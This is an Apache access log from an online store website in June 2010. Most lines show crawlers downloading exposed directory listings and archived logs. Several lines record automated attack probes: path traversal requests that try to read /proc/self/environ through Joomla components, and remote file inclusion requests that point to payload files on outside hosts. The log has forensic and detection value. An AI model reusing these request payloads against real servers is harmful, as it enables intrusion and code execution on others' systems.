178.63.50.147 - - [21/Jun/2010:02:38:40 -0400] "GET /images/_notes/ HTTP/1.1" 200 15469 "http://www.aceonlinestore.com/images/_notes/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:38:40 -0400] "GET /images/tools/ HTTP/1.1" 200 3703 "http://www.aceonlinestore.com/images/tools/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:38:40 -0400] "GET /images/items/ HTTP/1.1" 200 80009 "http://www.aceonlinestore.com/images/items/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:38:40 -0400] "GET /logs/access_log.Q109050700 HTTP/1.1" 200 301885 "http://www.aceonlinestore.com/logs/access_log.Q109050700" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
78.46.71.218 - - [21/Jun/2010:02:38:59 -0400] "GET /ACE.html HTTP/1.1" 200 5877 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
78.46.76.90 - - [21/Jun/2010:02:39:00 -0400] "GET /images/ HTTP/1.1" 200 49338 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.438)"
78.46.72.56 - - [21/Jun/2010:02:39:00 -0400] "GET /logs/ HTTP/1.1" 200 55286 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.431)"
78.46.71.218 - - [21/Jun/2010:02:39:01 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
78.46.71.218 - - [21/Jun/2010:02:39:03 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.436)"
78.46.71.218 - - [21/Jun/2010:02:39:05 -0400] "GET /ACE.html HTTP/1.1" 200 5877 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4310)"
78.46.72.56 - - [21/Jun/2010:02:39:06 -0400] "GET /logs/ HTTP/1.1" 200 55286 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.435)"
78.46.76.90 - - [21/Jun/2010:02:39:07 -0400] "GET /images/ HTTP/1.1" 200 49338 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.438)"
78.46.76.90 - - [21/Jun/2010:02:39:19 -0400] "GET /scripts/ HTTP/1.1" 200 802 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.438)"
78.46.76.90 - - [21/Jun/2010:02:39:20 -0400] "GET /scripts/ HTTP/1.1" 200 802 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.438)"
78.46.71.218 - - [21/Jun/2010:02:39:22 -0400] "GET /Includes/ HTTP/1.1" 200 220 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.435)"
78.46.71.218 - - [21/Jun/2010:02:39:23 -0400] "GET /Includes/ HTTP/1.1" 200 220 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
78.46.71.217 - - [21/Jun/2010:02:39:26 -0400] "GET / HTTP/1.1" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4317)"
78.46.71.217 - - [21/Jun/2010:02:39:27 -0400] "GET / HTTP/1.1" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.432)"
78.46.66.124 - - [21/Jun/2010:02:39:27 -0400] "GET /index.htm HTTP/1.1" 200 870 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4316)"
78.46.66.124 - - [21/Jun/2010:02:39:28 -0400] "GET /index.htm HTTP/1.1" 200 870 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
78.46.66.124 - - [21/Jun/2010:02:39:29 -0400] "GET /CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):20114_________________________ HTTP/1.1" 200 77252 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.50.147 - - [21/Jun/2010:02:38:42 -0400] "GET /logs/access_log.Q109051600 HTTP/1.1" 200 2853952 "http://www.aceonlinestore.com/logs/access_log.Q109051600" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:38:42 -0400] "GET /logs/access_log.Q109050800 HTTP/1.1" 200 5406893 "http://www.aceonlinestore.com/logs/access_log.Q109050800" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:38:42 -0400] "GET /logs/access_log.Q109051700 HTTP/1.1" 200 2276726 "http://www.aceonlinestore.com/logs/access_log.Q109051700" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:38:42 -0400] "GET /logs/access_log.Q109051300 HTTP/1.1" 200 5889638 "http://www.aceonlinestore.com/logs/access_log.Q109051300" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:38:42 -0400] "GET /logs/access_log.Q109051100 HTTP/1.1" 200 5205411 "http://www.aceonlinestore.com/logs/access_log.Q109051100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:38:42 -0400] "GET /logs/access_log.Q109051500 HTTP/1.1" 200 6117848 "http://www.aceonlinestore.com/logs/access_log.Q109051500" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:38:42 -0400] "GET /logs/access_log.Q109051400 HTTP/1.1" 200 6017281 "http://www.aceonlinestore.com/logs/access_log.Q109051400" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:38:42 -0400] "GET /logs/access_log.Q109050900 HTTP/1.1" 200 3163151 "http://www.aceonlinestore.com/logs/access_log.Q109050900" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:38:42 -0400] "GET /logs/access_log.Q109051000 HTTP/1.1" 200 3272696 "http://www.aceonlinestore.com/logs/access_log.Q109051000" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:38:42 -0400] "GET /logs/access_log.Q109051200 HTTP/1.1" 200 6040641 "http://www.aceonlinestore.com/logs/access_log.Q109051200" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
78.46.71.217 - - [21/Jun/2010:02:39:48 -0400] "GET / HTTP/1.1" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4318)"
78.46.71.217 - - [21/Jun/2010:02:39:48 -0400] "GET / HTTP/1.1" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.438)"
78.46.66.124 - - [21/Jun/2010:02:40:26 -0400] "GET /index.htm HTTP/1.1" 200 870 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
78.46.66.124 - - [21/Jun/2010:02:40:26 -0400] "GET /index.htm HTTP/1.1" 200 870 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4310)"
78.46.66.124 - - [21/Jun/2010:02:40:28 -0400] "GET /CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):1870__________________________ HTTP/1.1" 200 77252 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4310)"
178.63.50.147 - - [21/Jun/2010:02:39:43 -0400] "GET /logs/access_log.Q109052700 HTTP/1.1" 200 4217417 "http://www.aceonlinestore.com/logs/access_log.Q109052700" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:39:43 -0400] "GET /logs/access_log.Q109052100 HTTP/1.1" 200 5038627 "http://www.aceonlinestore.com/logs/access_log.Q109052100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:39:43 -0400] "GET /logs/access_log.Q109051800 HTTP/1.1" 200 5218469 "http://www.aceonlinestore.com/logs/access_log.Q109051800" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:39:43 -0400] "GET /logs/access_log.Q109052200 HTTP/1.1" 200 4757864 "http://www.aceonlinestore.com/logs/access_log.Q109052200" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:39:43 -0400] "GET /logs/access_log.Q109051900 HTTP/1.1" 200 5938231 "http://www.aceonlinestore.com/logs/access_log.Q109051900" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:39:43 -0400] "GET /logs/access_log.Q109052600 HTTP/1.1" 200 4651429 "http://www.aceonlinestore.com/logs/access_log.Q109052600" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:39:43 -0400] "GET /logs/access_log.Q109052400 HTTP/1.1" 200 2479154 "http://www.aceonlinestore.com/logs/access_log.Q109052400" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:39:43 -0400] "GET /logs/access_log.Q109052300 HTTP/1.1" 200 2758218 "http://www.aceonlinestore.com/logs/access_log.Q109052300" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:39:43 -0400] "GET /logs/access_log.Q109052000 HTTP/1.1" 200 5825651 "http://www.aceonlinestore.com/logs/access_log.Q109052000" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:39:43 -0400] "GET /logs/access_log.Q109052500 HTTP/1.1" 200 2746180 "http://www.aceonlinestore.com/logs/access_log.Q109052500" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
78.46.66.125 - - [21/Jun/2010:02:40:55 -0400] "GET /Includes/ HTTP/1.1" 200 220 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.439)"
78.46.66.125 - - [21/Jun/2010:02:40:57 -0400] "GET /Includes/ HTTP/1.1" 200 220 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.50.147 - - [21/Jun/2010:02:40:43 -0400] "GET /logs/access_log.Q109053100 HTTP/1.1" 200 1986553 "http://www.aceonlinestore.com/logs/access_log.Q109053100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:40:43 -0400] "GET /logs/access_log.Q109060600 HTTP/1.1" 200 2519002 "http://www.aceonlinestore.com/logs/access_log.Q109060600" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:40:43 -0400] "GET /logs/access_log.Q109060500 HTTP/1.1" 200 3718537 "http://www.aceonlinestore.com/logs/access_log.Q109060500" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:40:43 -0400] "GET /logs/access_log.Q109060400 HTTP/1.1" 200 4467320 "http://www.aceonlinestore.com/logs/access_log.Q109060400" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:40:43 -0400] "GET /logs/access_log.Q109053000 HTTP/1.1" 200 2289625 "http://www.aceonlinestore.com/logs/access_log.Q109053000" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:40:43 -0400] "GET /logs/access_log.Q109060200 HTTP/1.1" 200 4890211 "http://www.aceonlinestore.com/logs/access_log.Q109060200" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:40:43 -0400] "GET /logs/access_log.Q109052900 HTTP/1.1" 200 4356729 "http://www.aceonlinestore.com/logs/access_log.Q109052900" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:40:43 -0400] "GET /logs/access_log.Q109060300 HTTP/1.1" 200 3991095 "http://www.aceonlinestore.com/logs/access_log.Q109060300" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:40:43 -0400] "GET /logs/access_log.Q109052800 HTTP/1.1" 200 4403369 "http://www.aceonlinestore.com/logs/access_log.Q109052800" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:40:43 -0400] "GET /logs/access_log.Q109060100 HTTP/1.1" 200 4231911 "http://www.aceonlinestore.com/logs/access_log.Q109060100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
67.195.114.223 - - [21/Jun/2010:02:39:31 -0400] "GET /logs/error_log.Q109080700 HTTP/1.0" 200 2479551 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
216.17.105.143 - - [21/Jun/2010:02:41:57 -0400] "GET /logs/access_log.Q110053100/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.830"
216.17.105.143 - - [21/Jun/2010:02:41:57 -0400] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.830"
216.17.105.143 - - [21/Jun/2010:02:41:57 -0400] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 55286 "-" "libwww-perl/5.830"
178.63.50.147 - - [21/Jun/2010:02:41:42 -0400] "GET /logs/access_log.Q109053100 HTTP/1.1" 200 1986553 "http://www.aceonlinestore.com/logs/access_log.Q109053100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
114.108.128.56 - - [21/Jun/2010:02:42:33 -0400] "GET /logs/access_log.Q110060700//pingserver.php HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
114.108.128.56 - - [21/Jun/2010:02:42:33 -0400] "GET //pingserver.php HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
114.108.128.56 - - [21/Jun/2010:02:42:34 -0400] "GET /logs//pingserver.php HTTP/1.1" 404 218 "-" "libwww-perl/5.79"
114.108.128.56 - - [21/Jun/2010:02:42:49 -0400] "GET /logs/error_log.Q110060700//pingserver.php HTTP/1.1" 404 239 "-" "libwww-perl/5.79"
216.17.105.143 - - [21/Jun/2010:02:43:03 -0400] "GET /logs/access_log.Q110060700/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.830"
203.120.246.20 - - [21/Jun/2010:02:43:14 -0400] "GET /logs/access_log.Q109080600/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.808"
203.120.246.20 - - [21/Jun/2010:02:43:14 -0400] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.808"
203.120.246.20 - - [21/Jun/2010:02:43:15 -0400] "GET /logs/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.808"
178.63.50.147 - - [21/Jun/2010:02:42:38 -0400] "GET /logs/access_log.Q109060700 HTTP/1.1" 200 2068562 "http://www.aceonlinestore.com/logs/access_log.Q109060700" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:42:38 -0400] "GET /logs/access_log.Q109061000 HTTP/1.1" 200 4425432 "http://www.aceonlinestore.com/logs/access_log.Q109061000" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:42:38 -0400] "GET /logs/access_log.Q109061500 HTTP/1.1" 200 5178745 "http://www.aceonlinestore.com/logs/access_log.Q109061500" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:42:38 -0400] "GET /logs/access_log.Q109061400 HTTP/1.1" 200 2160115 "http://www.aceonlinestore.com/logs/access_log.Q109061400" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:42:38 -0400] "GET /logs/access_log.Q109061100 HTTP/1.1" 200 4824283 "http://www.aceonlinestore.com/logs/access_log.Q109061100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:42:38 -0400] "GET /logs/access_log.Q109061300 HTTP/1.1" 200 2008810 "http://www.aceonlinestore.com/logs/access_log.Q109061300" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:42:38 -0400] "GET /logs/access_log.Q109060900 HTTP/1.1" 200 4908335 "http://www.aceonlinestore.com/logs/access_log.Q109060900" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:42:38 -0400] "GET /logs/access_log.Q109060800 HTTP/1.1" 200 4780020 "http://www.aceonlinestore.com/logs/access_log.Q109060800" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:42:38 -0400] "GET /logs/access_log.Q109061200 HTTP/1.1" 200 4908958 "http://www.aceonlinestore.com/logs/access_log.Q109061200" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:42:38 -0400] "GET /logs/access_log.Q109061600 HTTP/1.1" 200 5728303 "http://www.aceonlinestore.com/logs/access_log.Q109061600" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
219.255.132.83 - - [21/Jun/2010:02:43:43 -0400] "GET /logs/senetman/html/index.php?page=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
219.255.132.83 - - [21/Jun/2010:02:43:43 -0400] "GET /senetman/html/index.php?page=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
219.255.132.83 - - [21/Jun/2010:02:43:44 -0400] "GET /logs/access_log.Q109082000/senetman/html/index.php?page=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
82.76.12.197 - - [21/Jun/2010:02:43:48 -0400] "GET /logs/access_log.Q110053100/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.831"
82.76.12.197 - - [21/Jun/2010:02:43:48 -0400] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.831"
82.76.12.197 - - [21/Jun/2010:02:43:49 -0400] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 55286 "-" "libwww-perl/5.831"
178.63.50.147 - - [21/Jun/2010:02:43:39 -0400] "GET /logs/access_log.Q109060700 HTTP/1.1" 200 2068562 "http://www.aceonlinestore.com/logs/access_log.Q109060700" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:43:39 -0400] "GET /logs/access_log.Q109061300 HTTP/1.1" 200 2008810 "http://www.aceonlinestore.com/logs/access_log.Q109061300" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
75.125.138.2 - - [21/Jun/2010:02:44:25 -0400] "GET /logs/includes/functions_admin.php?phpbb_root_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
75.125.138.2 - - [21/Jun/2010:02:44:25 -0400] "GET /includes/functions_admin.php?phpbb_root_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
75.125.138.2 - - [21/Jun/2010:02:44:25 -0400] "GET /logs/access_log.Q109052200/includes/functions_admin.php?phpbb_root_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
75.125.138.2 - - [21/Jun/2010:02:44:30 -0400] "GET /includes/functions_admin.php?phpbb_root_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
75.125.138.2 - - [21/Jun/2010:02:44:30 -0400] "GET /logs/access_log.Q109052200/includes/functions_admin.php?phpbb_root_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
75.125.138.2 - - [21/Jun/2010:02:44:30 -0400] "GET /logs/includes/functions_admin.php?phpbb_root_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
75.125.138.2 - - [21/Jun/2010:02:44:44 -0400] "GET /logs/access_log.Q109101300/includes/functions_admin.php?phpbb_root_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
75.125.138.2 - - [21/Jun/2010:02:44:44 -0400] "GET /includes/functions_admin.php?phpbb_root_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
75.125.138.2 - - [21/Jun/2010:02:44:45 -0400] "GET /logs/includes/functions_admin.php?phpbb_root_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
75.125.138.2 - - [21/Jun/2010:02:44:49 -0400] "GET /logs/access_log.Q110010400/includes/functions_admin.php?phpbb_root_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
178.63.50.147 - - [21/Jun/2010:02:44:04 -0400] "GET /logs/access_log.Q109062100 HTTP/1.1" 200 1659218 "http://www.aceonlinestore.com/logs/access_log.Q109062100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:44:04 -0400] "GET /logs/access_log.Q109062400 HTTP/1.1" 200 4898892 "http://www.aceonlinestore.com/logs/access_log.Q109062400" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:44:04 -0400] "GET /logs/access_log.Q109062300 HTTP/1.1" 200 5026682 "http://www.aceonlinestore.com/logs/access_log.Q109062300" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:44:04 -0400] "GET /logs/access_log.Q109062500 HTTP/1.1" 200 5016688 "http://www.aceonlinestore.com/logs/access_log.Q109062500" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:44:04 -0400] "GET /logs/access_log.Q109061700 HTTP/1.1" 200 4385823 "http://www.aceonlinestore.com/logs/access_log.Q109061700" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:44:04 -0400] "GET /logs/access_log.Q109061900 HTTP/1.1" 200 3745986 "http://www.aceonlinestore.com/logs/access_log.Q109061900" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:44:04 -0400] "GET /logs/access_log.Q109061800 HTTP/1.1" 200 4635924 "http://www.aceonlinestore.com/logs/access_log.Q109061800" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:44:04 -0400] "GET /logs/access_log.Q109062600 HTTP/1.1" 200 4172484 "http://www.aceonlinestore.com/logs/access_log.Q109062600" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:44:04 -0400] "GET /logs/access_log.Q109062200 HTTP/1.1" 200 4929791 "http://www.aceonlinestore.com/logs/access_log.Q109062200" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:44:04 -0400] "GET /logs/access_log.Q109062000 HTTP/1.1" 200 2302740 "http://www.aceonlinestore.com/logs/access_log.Q109062000" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
67.15.152.183 - - [21/Jun/2010:02:45:14 -0400] "GET /index.php?option=com_facileforms&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.65"
178.63.50.147 - - [21/Jun/2010:02:45:03 -0400] "GET /logs/access_log.Q109062100 HTTP/1.1" 200 1659218 "http://www.aceonlinestore.com/logs/access_log.Q109062100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
82.76.12.197 - - [21/Jun/2010:02:45:17 -0400] "GET /logs/access_log.Q110060700/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.831"
216.17.105.143 - - [21/Jun/2010:02:45:28 -0400] "GET /logs/access_log.Q110060700/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.830"
216.17.105.143 - - [21/Jun/2010:02:45:28 -0400] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.830"
216.17.105.143 - - [21/Jun/2010:02:45:28 -0400] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 55286 "-" "libwww-perl/5.830"
219.255.132.83 - - [21/Jun/2010:02:45:36 -0400] "GET /logs/access_log.Q109121200/senetman/html/index.php?page=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
75.125.138.2 - - [21/Jun/2010:02:45:44 -0400] "GET /includes/functions_admin.php?phpbb_root_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
75.125.138.2 - - [21/Jun/2010:02:45:44 -0400] "GET /logs/includes/functions_admin.php?phpbb_root_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
75.125.138.2 - - [21/Jun/2010:02:45:44 -0400] "GET /logs/access_log.Q109101300/includes/functions_admin.php?phpbb_root_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
